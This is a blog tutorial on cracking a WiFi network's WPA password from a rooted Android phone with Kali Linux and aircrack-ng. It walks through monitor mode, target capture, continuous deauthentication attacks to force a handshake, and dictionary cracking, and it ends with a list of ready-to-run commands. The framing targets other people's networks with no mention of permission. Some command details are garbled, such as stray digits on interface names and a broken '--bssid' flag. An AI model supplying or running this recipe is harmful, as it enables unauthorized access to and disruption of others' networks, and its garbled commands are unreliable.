HomeAndroidHow to Get Wifi Password on Android Using Kali Linux

How to Get Wifi Password on Android Using Kali Linux

-

How to get wifi Password on Android Using Kali Linux

So todays i would like to share with you all a best and latest hacking tricks to get wifi password from android phone. but for this, Hack your android phone must be rooted.in my previous tutorials i’s shared a best and easiest method to root android phone in ONE Click. if your android is rooted then you can easily hack wifi password using kali linux.This is amazing trick to hack wifi password from android by installing kali linux in your android 2020.

 hack wifi password on android
How to Hack Wifi Password on Android Using Kali Linux

Also Read: How To ROOT Android Phone in One CLICK 

How To Hack WiFi Password Using Android.

#Requirements 

#1. Kali Linux For Android Phone.

#2. Rooted Android Device.

Suggestion:- A little Suggestion for all readers who read this hack, This Wifi password hacking method is not easy to implement, so i want to assure you that do this on your own risk. Unless, wait my new tutorials on How To Hack wifi password on android.

Hack Wifi Password on Android Using KALI LINUX:-

Also Read:- How To Hack WiFi Password From Android (Without ROOT) 

#1. Install Kali Linux or Linux Deploy in your android device with aircrack-ng.

#2. if you don’t have aircrack-ng suite get it by this commend in terminal. Follow Below Steps.

sudo apt-get install aircrack-ng

Then a wireless network adapter that support monitor mode Shown on your android screen like 

a- Alfa 2W AWUS036NH

b- Alfa AWUS036H

c- wifiy-city 56G

#3.A word list comprising of all the possible different combination of pass-phrases.

Now let’s go ahead and lets try to hack wifi password on android using kali linux easily.

in this hack iTechhacks will be using wifiy-city 56G card on Kali linux 2 sana

#4. open up your terminal as root and type:-

ifconfig

this will display you all the networking interfaces that are connected to your device.

hack wifi password on android
hack wifi password on android

If your wireless network adapter is working fine you should see the ”wlan0 ” the name may change if you have more then one connected wireless adapter.

#5. Now to start monitor mode type:-

airmon-ng start wlan0

‘airmon-ng’ is a traffic monitoring tool

‘wlan0’ is your wireless interface

after this command it would start the monitor mode

Note: The monitor mode is working under wlan0mon , so this is your card name for now.

in the red area a list of process id’s that cause trouble during the process so kill those processes by typing

kill <pid>

So, according to me :

kill 743 898 1070 1071 1081

now type ifconfig and this will display the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 .

#6.To show the list of available WiFi network type:-

airodump-ng wlan0mon2

‘airodump-ng’ is a wifi packets capturing tool

‘wlan0mon is my monitoring interface

airodump-ng‘ will start capturing all packets and from the captured packets.

select your target and note its ‘bssid’ (bssid = base service set identifier) and channel-

then stop the capture by pressing “contrl+c“.

#7. Start capturing the packets of your target network

type the following command:- 

[sociallocker]airodump-ng -c <channel> -w <name> –bssid <bssid> wlan0mon[/sociallocker]

E.g: airodump-ng -c 2 -w wifi –bssid C0:4A:00:F0:F4:24 wlan0mon3

hack wifi password on android
wifi password on android

this will start the capturing of packets.and if you get the handshake you wont need the aireplay command.if you don’t get the handshake yet,while the capturing of packets goes on, open a new terminal as root and type:-

aireplay-ng -0 0 -a <bssid> mon0

aireplay-ng = tool for deauthentication, fake authentication and other packet injections,

-0 = number associated for deauthentication,

0 = deauth count,

-a = bssid, here we are trying to send a deauthentication request.

according to me, the command looks like

aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon4

hack wifi password on android
hack wifi password on android

after few seconds stop it using contrl+c.

now after we have successful captured the wpa handshake

Also Read:- How To See Saved Wifi Passwords In Android (ROOT)

#8. Stop the capturing using contrl+c and type “ls” that would bring up all the current directories and files.

Select the file with “.cap“ extension and type the following command:-

aircrack-ng -w <full location of the word list> <name of the file>

aircrack-ng is a tool that helps in cracking the wifi password

In my case the command looks like

aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap

Now it starts finding suitable pass phrase.

and now all you have to do is wait till you see the lovely news ( KEY Found ( KEY is HERE )

Also Read:- How To Hack Android Game Without Root 

hack wifi password on android
hack wifi password on android

Hack Wifi Password on Android Using Kali Linux – Conclusion 

1) airodump-ng wlan0mon

2) airodump-ng -c 9 -w wifi –bssid C4:6E:1F:F6:34:B8 wlan0mon

3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon

4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

So this is all about wifi password hacking trick . this is not easy way to hack wifi password, but if you do this correctly then it works amazingly, but iTech Hacks recommend you to dont follow this method because sometime this method caught you in trouble.hack wifi password on android this is only for those who demand this. 

Mukesh Bhardwaj
Mukesh Bhardwajhttps://itechhacks.com
Editor - An aspiring Web Entrepreneur and avid Tech Geek. He loves to cover topics related to iOS, Tech News, and the latest tricks and tips floating over the Internet.

2 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here

LATEST